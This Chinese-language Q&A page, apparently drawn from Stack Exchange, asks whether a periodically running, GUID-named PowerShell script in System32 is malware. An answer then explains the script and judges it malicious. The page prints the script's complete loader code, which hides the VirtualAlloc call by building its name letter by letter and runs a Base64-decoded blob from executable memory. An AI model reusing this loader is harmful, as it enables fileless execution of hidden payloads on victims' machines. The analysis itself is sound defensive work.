这款自动周期性运行的PowerShell脚本是否为恶意程序?
脚本功能分析与恶意判定咨询
我通过Process Explorer追踪进程命令行参数,发现路径为C:\Windows\System32\8208c741-a361-4e21-83e2-6d7f9a3b5b89.ps1的PowerShell脚本会周期性自动运行(我不熟悉PowerShell)。脚本开头包含多个以$dat +=开头的超长字符串,脚本代码如下:
$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase) foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) { $assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly; } function Get-Ptr { param ( [IntPtr] $ptr, [type[]] $params, [type] $rettype ) $bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]); $bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed'); $bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed'); $del = $bu.CreateType(); return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del); } function Get-Func { param ( [string] $module, [string] $name, [type[]] $params, [type] $rettype ) $na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods')); $gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')); $md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module)); $ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name)); return Get-Ptr $ptr $params $rettype; } $fname = 'V'; $fname += 'i'; $fname += 'r'; $fname += 't'; $fname += 'u'; $fname += 'a'; $fname += 'l'; $fname += 'A'; $fname += 'l'; $fname += 'l'; $fname += 'o'; $fname += 'c'; $func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]); $dat = [Convert]::FromBase64String($dat); $patch = $func.Invoke(0, 8208, 12288, 64); [Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 8208); $patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]); $patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(95232); [Runtime.InteropServices.Marshal]::Copy($dat, 8208, $patch2, 95232); $patchfunc.Invoke(0, $patch2, 1, 0); while($true) { Start-Sleep 10 }
该脚本运行后似乎会与System32\drivers\VwA5N1xq4w.sys和System32\drivers\4mscxjme2.sys文件交互;这些文件内仅包含大量如下格式的日志内容:
08/23/2021 00:24:32.582 [506]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040 08/23/2021 00:24:32.582 [507]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
现咨询该脚本的具体功能及是否属于恶意程序。
脚本功能分析
- 内存恶意代码加载执行:
脚本通过字符拼接方式调用kernel32.dll的VirtualAlloc函数,在进程内存中分配可执行区域;随后将Base64解码后的二进制数据写入该内存区域,再将内存地址转为可执行函数指针并调用,本质是加载执行内存中的未知代码。 - 持久化驻留:
脚本末尾通过无限循环+10秒休眠的逻辑维持进程运行,防止自身退出,实现系统内的持续驻留。 - 驱动文件混淆:
脚本调用的内存代码会与System32\drivers下的两个随机命名驱动交互,但驱动内的日志是.NET程序集加载失败的错误信息(德语提示意为“程序集清单定义与引用不匹配”),属于无关内容,目的是混淆真实功能。
恶意判定
该脚本属于典型恶意程序,理由如下:
- 反检测手段:用字符拼接函数名、Base64编码payload的方式躲避静态查杀;
- 无文件执行特性:将恶意代码写入内存直接执行,避免在磁盘留下完整样本;
- 异常命名与路径:脚本和驱动使用随机GUID/无意义字符串命名,且存放在
System32这类系统目录,不符合正常系统文件规范; - 可疑操作行为:调用原生内存分配函数并执行未知内存代码,这类操作常见于木马、挖矿程序或间谍软件。
建议立即终止相关进程,删除对应脚本和驱动文件,并进行全面系统病毒扫描。
内容的提问来源于stack exchange,提问作者cvdx
相关产品推荐
相关产品推荐

